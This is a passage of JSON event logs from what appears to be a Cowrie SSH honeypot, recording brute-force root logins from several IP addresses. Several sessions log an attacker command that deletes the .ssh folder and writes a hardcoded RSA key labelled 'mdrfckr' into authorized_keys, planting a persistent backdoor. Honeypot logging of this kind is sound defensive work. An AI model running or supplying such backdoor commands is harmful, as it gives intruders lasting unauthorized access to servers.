penssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:10:14.284969Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.login.success","username":"root","password":"Sy123456.","message":"login attempt [root/Sy123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:10:15.451297Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:10:16.035271Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:10:16.036105Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:10:16.037093Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:10:16.320403Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:10:16.989685Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:10:16.990355Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:10:17.273313Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:10:17.274207Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33076,"dst_ip":"1.2.3.4","dst_port":22,"session":"c25291e30e8c","protocol":"ssh","message":"New connection: 212.227.235.229:33076 (1.2.3.4:22) [session: c25291e30e8c]","sensor":"my-vps","timestamp":"2025-08-26T02:10:17.531073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:10:17.532008Z","src_ip":"212.227.235.229","session":"c25291e30e8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:10:17.790186Z","src_ip":"212.227.235.229","session":"c25291e30e8c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:10:18.864871Z","src_ip":"212.227.235.229","session":"c25291e30e8c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:10:20.126122Z","src_ip":"212.227.235.229","session":"c25291e30e8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33090,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebda616680fc","protocol":"ssh","message":"New connection: 212.227.235.229:33090 (1.2.3.4:22) [session: ebda616680fc]","sensor":"my-vps","timestamp":"2025-08-26T02:10:20.406096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:10:20.407149Z","src_ip":"212.227.235.229","session":"ebda616680fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:10:20.687792Z","src_ip":"212.227.235.229","session":"ebda616680fc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:10:21.850600Z","src_ip":"212.227.235.229","session":"ebda616680fc"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:10:22.132787Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:10:22.133749Z","src_ip":"212.227.235.229","session":"ebda616680fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45960,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae10f438e5f6","protocol":"ssh","message":"New connection: 212.227.235.229:45960 (1.2.3.4:22) [session: ae10f438e5f6]","sensor":"my-vps","timestamp":"2025-08-26T02:11:39.599972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:11:39.600833Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:11:39.860662Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.login.success","username":"root","password":"123ASDasd","message":"login attempt [root/123ASDasd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:11:40.941798Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:11:41.521687Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:11:41.522379Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:11:41.523494Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:11:41.783398Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:11:42.318499Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:11:42.319259Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:11:42.580729Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:11:42.581952Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45966,"dst_ip":"1.2.3.4","dst_port":22,"session":"9daaf8e9ed08","protocol":"ssh","message":"New connection: 212.227.235.229:45966 (1.2.3.4:22) [session: 9daaf8e9ed08]","sensor":"my-vps","timestamp":"2025-08-26T02:11:42.837534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:11:42.838421Z","src_ip":"212.227.235.229","session":"9daaf8e9ed08"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:11:43.097384Z","src_ip":"212.227.235.229","session":"9daaf8e9ed08"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:11:44.171949Z","src_ip":"212.227.235.229","session":"9daaf8e9ed08"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:11:45.432588Z","src_ip":"212.227.235.229","session":"9daaf8e9ed08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49796,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd5274eb50e","protocol":"ssh","message":"New connection: 212.227.235.229:49796 (1.2.3.4:22) [session: 9cd5274eb50e]","sensor":"my-vps","timestamp":"2025-08-26T02:11:45.714109Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:11:45.714766Z","src_ip":"212.227.235.229","session":"9cd5274eb50e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:11:45.995735Z","src_ip":"212.227.235.229","session":"9cd5274eb50e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:11:47.165826Z","src_ip":"212.227.235.229","session":"9cd5274eb50e"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:11:47.446824Z","src_ip":"212.227.235.229","session":"ae10f438e5f6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:11:47.447929Z","src_ip":"212.227.235.229","session":"9cd5274eb50e"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":60050,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ff746916fd3","protocol":"ssh","message":"New connection: 45.88.8.186:60050 (1.2.3.4:22) [session: 9ff746916fd3]","sensor":"my-vps","timestamp":"2025-08-26T02:12:21.298860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:12:21.982629Z","src_ip":"45.88.8.186","session":"9ff746916fd3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:12:21.983331Z","src_ip":"45.88.8.186","session":"9ff746916fd3"}
{"eventid":"cowrie.login.success","username":"root","password":"00990099","message":"login attempt [root/00990099] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:12:23.290362Z","src_ip":"45.88.8.186","session":"9ff746916fd3"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:12:23.747518Z","src_ip":"45.88.8.186","session":"9ff746916fd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":1634,"dst_ip":"1.2.3.4","dst_port":22,"session":"af4f70755b5c","protocol":"ssh","message":"New connection: 212.227.125.160:1634 (1.2.3.4:22) [session: af4f70755b5c]","sensor":"my-vps","timestamp":"2025-08-26T02:12:41.040277Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:12:41.041538Z","src_ip":"212.227.125.160","session":"af4f70755b5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":1913,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8f950363d55","protocol":"ssh","message":"New connection: 212.227.125.160:1913 (1.2.3.4:22) [session: d8f950363d55]","sensor":"my-vps","timestamp":"2025-08-26T02:12:41.151751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:12:41.152659Z","src_ip":"212.227.125.160","session":"d8f950363d55"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hma